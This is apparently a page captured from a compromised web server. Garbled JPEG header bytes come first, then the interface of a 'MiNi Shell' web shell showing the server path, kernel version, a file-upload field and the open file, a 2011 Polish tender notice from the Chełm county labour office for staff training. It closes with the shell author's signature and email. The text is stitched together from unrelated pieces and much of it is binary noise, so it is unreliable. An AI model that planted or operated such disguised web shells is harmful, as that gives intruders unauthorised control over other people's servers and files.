JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110307/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110307/37894-N-2011.html

<p class="kh_header"><b>Chełm: Szkolenie dla pracowników 
Powiatowego Urzędu Pracy w Chełmie 
-Komunikacja interpersonalna i public relations</b><br>
<b>Numer ogłoszenia: 37894 - 2011; data zamieszczenia: 07.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Chełmie , Pl. Niepodległości 1, 22-100 Chełm, woj. lubelskie, tel. 082 5627697, faks 082 5627668.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.pup.chelm-samorzady.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Szkolenie dla pracowników 
Powiatowego Urzędu Pracy w Chełmie 
-Komunikacja interpersonalna i public relations.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Szkolenie -Komunikacja interpersonalna i public relations- dla 40 osób w dwóch grupach szkoleniowych po 20 osób w każdej grupie. Szkolenie dla 25 pracowników finansowane będzie z projektu pt. -Kompetentna kadra-skuteczny urząd- w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego ze środków Europejskiego Funduszu Społecznego, Priorytet VI -Rynek pracy otwarty dla wszystkich-, Działanie 6.1 -Poprawa dostępu do zatrudnienia oraz wspieranie aktywności zawodowej w regionie, Poddziałanie 6.1.2 -Wspieranie powiatowych i wojewódzkich urzędów pracy w realizacji na rzecz aktywizacji zawodowej osób bezrobotnych w regionie Umowa nr POKL.06.01.02-06-024-09-02. Szkolenie dla pozostałych 15 osób finansowane będzie ze środków Funduszu Pracy.
2.Kod CPV 80511000-9 usługi szkolenia personelu.
3.Czas trwania szkolenia:
3.1. dwudniowe szkolenie zostanie przeprowadzone w dwóch grupach i będzie obejmowało 12 godzin zajęć dydaktycznych na 1 uczestnika tj. 2 dni szkolenia.
3.2. szczegółowy harmonogram szkolenia powinien przewidywać:
3.2.1.  rozpoczęcie zajęć nie później niż o godzinie 900 pierwszego dnia,
3.2.2. zakończenie zajęć w drugim dniu szkolenia nie wcześniej niż o godzinie 1430, 
3.2.3. krótkie przerwy kawowe i obiadowe.
3.3. przewidywany termin realizacji szkolenia:
I grupa 09-10 maja 2011r. (20 osób), II grupa 12-13 maja 2011r. (20 osób).
4.	Program szkolenia powinien zawierać:
4.1. Nazwę i zakres szkolenia,
4.2. Harmonogram zajęć,
4.3. Czas trwania i sposób organizacji szkolenia,
4.4. Cele szkolenia.
5.Program szkolenia powinien zawierać w szczególności:
5.1. Komunikacja interpersonalna:
5.1.1. Motywowanie siebie i innych,
5.1.2. Dystans interpersonalny,
5.1.3. Radzenie sobie w sytuacjach konfliktowych,
5.1.4. Radzenie sobie ze stresem.
5.2. Public relations:
5.2.1. Czym zajmuje się PR?
5.2.2. Zakres działań PR,
5.2.3. Uwarunkowania prawne PR,
5.2.4. Specyfika PR jednostki organizacyjnej samorządu terytorialnego,
5.2.5. Zasady organizowania działań PR -strategia, programy, dobór i wykorzystywanie nowoczesnych technik PR, miejsce w strukturze organizacyjnej Urzędu,
5.2.6. Pozyskiwanie informacji i wykorzystywanie w pracy bieżącej
5.2.7. Kultura organizacyjna urzędu - wizerunek urzędu, promocja -promocja produktu, kanały przekazywania informacji,  materiały promocyjne, wydawnictwa,
5.2.8. Imprezy - seminaria, konferencje, spotkania, targi itp. - organizacja i udział,
5.2.9. Komunikowanie się z grupami otoczenia ,
5.2.10. Współpraca z mediami, w tym m. in.  - przygotowanie komunikatów prasowych, kontakty z dziennikarzami zasady udzielania wywiadu, organizacja konferencji prasowej, komunikowanie się za pomocą mediów/przekaz werbalny, pozawerbalny, ton głosu,
5.2.11. PR w sytuacji kryzysowej.
6.Zajęcia nie mogą być prowadzone metodą e-learningu.
7.Uczestnicy szkolenia powinni otrzymać zaświadczenia o ukończeniu szkolenia, które powinny być oznaczone zgodnie z wymaganiami określonymi w rozporządzeniu Rady (WE) nr 1083-2006 z dnia 11 lipca 2006r. (Dz.Urz. L210-25 z 31.07.2006) oraz zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach POKL 2007-2013 z dnia 4 lutego 2009r. dostępnymi na stronie http:www.efs.gov.pl. oraz z rozporządzeniem Ministra Edukacji i Nauki z dnia 3 lutego 2006r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. nr31, poz.216).
8.Wykonawca zapewni uczestnikom:
8.1. Zakwaterowanie w pokojach niewiększych niż dwuosobowe z łazienkami,
8.2. Całodzienne wyżywienie,
8.3. Poczęstunek podczas przerw w postaci kawy, herbaty, ciastek i wody mineralnej,
8.4. Transport z Chełma na miejsce szkolenia i z powrotem.
8.5. Ubezpieczenie uczestników szkolenia.
9.Wykonawca zapewni dla każdego uczestnika szkolenia (plus zestaw dla Zamawiającego) materiały szkoleniowe w formie: 
9.1.  Dwóch podręczników (jeden dotyczący komunikacji interpersonalnej, drugi PR).
9.2.  Organizera formatu A4 zawierającego: długopis, notatnik, kieszonki na wizytówki i uchwyt na długopis.
9.3. Materiały szkoleniowe powinny być oznaczone zgodnie z wymaganiami zawartymi w rozporządzeniu Rady (WE) nr 1083-2006 z dnia 11 lipca 2006r. (Dz.Urz. L210-25 z 31.07.2006) oraz zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach POKL 2007-2013 z dnia 4 lutego 2009r. dostępnymi na stronie http:/www.efs.gov.pl.
10.Miejsce odbywania szkolenia: Kazimierz Dolny nad Wisłą.
11.Zajęcia szkoleniowe powinny odbywać się w tym samym budynku, w którym zakwaterowani będą uczestnicy.
12.Zajęcia szkoleniowe powinny odbywać się w Sali wykładowej wyposażonej w stół, krzesła, tablice Flip-chart, laptop, rzutnik multimedialny i ekran.
13.Pomieszczenia i miejsca w których będą się odbywać zajęcia powinny spełniać wymagania BHP i P.poż uregulowane w przepisach odrębnych.
14.Każdy uczestnik powinien mieć zapewnione indywidualne stanowisko pracy.
15.Wykonawca przekaże zamawiającemu w terminie nie później niż 15 dni roboczych przed planowanym terminem rozpoczęcia szkolenia następujących dokumentów:
15.1. CV trenerów.
15.2. Program i harmonogram szkolenia.
15.3. Wykaz materiałów szkoleniowych.
16.Wykonawca zobowiązany będzie przekazać Zamawiającemu w terminie 7 dni od dnia zakończenia szkolenia następujące dokumenty:
16.1. List obecności.
16.2. Zaświadczeń potwierdzających ukończenie szkolenia.
16.3. Faktury VAT
17.Wykonawca przed rozpoczęciem szkolenia, zobowiązany jest do zapoznania jego uczestników ze szczegółowym programem poprzez przekazanie im harmonogramu realizowanych zajęć.
18.Wykonawca musi wyznaczyć osobę, która będzie kierownikiem- koordynatorem szkolenia. Osoba ta musi przebywać (przez okres trwania szkolenia) w miejscu odbywania zajęć w celu zapewnienia prawidłowej organizacji szkolenia. Kierownikiem- koordynatorem nie może być osoba prowadząca szkolenie.
19.Wykonawca zobowiązany jest przechowywać wszystkie oryginalne dokumenty potwierdzające realizację szkolenia do  31.12.2020r.
20.Podana w ofercie cena powinna zawierać:
20.1. Koszt usługi szkoleniowej.
20.2. Koszt zakwaterowania.
20.3. Koszt wyżywienia.
20.4. Koszt transportu na miejsce szkolenia i z powrotem.
20.5. Koszt ubezpieczenia.
20.6. Koszt materiałów szkoleniowych.
21.W ofercie powinien być podany ogólny koszt szkolenia wszystkich uczestników oraz koszt jednej osobogodziny szkolenia (jedna osobogodzina szkolenia = cena szkolenia: liczba godzin szkolenia: liczba osób na szkoleniu)
22.Wykonawca do rozliczenia szkolenia powinien dostarczyć Zamawiającemu dokumenty potwierdzające wydatki poniesione w związku z realizacją szkolenia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.51.10.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 4.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymaga się</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- na potwierdzenie spełnienia warunków posiadania uprawnień do wykonywania określonej działalności lub czynności Wykonawca winien wykazać, iż posiada wpis do rejestru instytucji szkoleniowych  prowadzonego przez WUP właściwy ze względu na siedzibę instytucji szkoleniowej</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na potwierdzenie spełnienia warunku posiadania wiedzy i doświadczenia Wykonawca winien wykazać, że 
w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie wykonał co najmniej 3 szkolenia odpowiadające swoim rodzajem i wartością przedmiotowi zamówienia oraz załączeniu dokumentu potwierdzającego, że te usługi zostały wykonane lub są wykonywane należycie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunku dysponowania osobami zdolnymi do wykonania zamówienia Wykonawca  winien wykazać dysponowanie wykwalifikowaną kadrą tj.  wykładowcę- trenera posiadającego wykształcenie wyższe oraz kwalifikacje zawodowe i doświadczenie w prowadzeniu szkoleń z tego zakresu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wpis do rejestru instytucji szkoleniowych  prowadzonego przez WUP właściwy ze względu na siedzibę instytucji szkoleniowej
Wykonawca może polegać na  wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 40</li>
<li>2 - Program i materiały szkoleniowe - 20</li>
<li>3 - Doświadczenie jednostki szkolącej - 10</li>
<li>4 - Wykształcenie i doświadczenie kadry trenerskiej w prowadzeniu zajęć - 30</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pup-chelm.samorzady.pl/zamówienia publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy 
w Chełmie, Plac Niepodległości 1, 22-100 Chełm, p. 68,.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.03.2011 godzina 11:00, miejsce: Powiatowy Urząd Pracy w Chełmie, Pl.Niepodległości 1, p.164, 22-100 Chełm.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Szkolenie dla 25 pracowników finansowane będzie ze środków projektu pt. Kompetentna kadra-skuteczny urząd w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Priorytet VI Rynek pracy otwarty dla wszystkich, Działanie 6.1 -Poprawa dostępu do zatrudnienia oraz wspieranie aktywności zawodowej w regionie, Poddziałanie 6.1.2 -Wspieranie powiatowych i wojewódzkich urzędów pracy w realizacji na rzecz aktywizacji zawodowej osób bezrobotnych w regionie..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com